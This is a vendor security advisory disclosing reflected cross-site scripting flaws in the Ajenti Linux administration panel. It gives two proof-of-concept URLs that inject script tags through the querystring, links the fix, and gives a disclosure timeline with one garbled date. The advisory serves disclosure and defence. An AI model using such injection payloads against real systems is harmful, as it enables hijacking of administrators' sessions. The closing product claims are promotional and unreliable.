XSS Vulnerabilities in Ajenti

Information

Advisory by Netsparker (now Invicti)
Name: XSS Vulnerabilities in Ajenti
Software: Ajenti v1.2.21.6 and possibly below.
Vendor Homepage: http://ajenti.org/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-020

Description

Ajenti – Web-based Linux server administration panel.

Details

Ajenti is affected by XSS vulnerabilities in version v1.2.21.6.
Example PoC urls are as follows:

  • Cross-site Scripting
    https://example:8000/ajenti:static/resources.js'"--></style></scRipt><scRipt>alert(0x000085)</scRipt> (Querystring)
    https://example:8000/ajenti:static/resources.css'"--></style></scRipt><scRipt>alert(0x000091)</scRipt> (Querystring)

Learn more about Cross-site Scripting vulnerabilities:

Solution

https://github.com/Eugeny/ajenti/commit/d3fc5eb142ff16d55d158afb050af18d5ff09120

Advisory Timeline

08/04/2014 – First Contact
0807/06/2014 – First Contact
08/06/2014 – Second Contact
08/06/2014 – Vulnerability fixed
09/06/2014 – Advisory released

Credits

It has been discovered on testing of Invicti Web Application Security Scanner.

About Invicti

Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Invicti’s unique detection and exploitation techniques allows it to be dead accurate in reporting hence it’s the first and the only False Positive Free web application security scanner.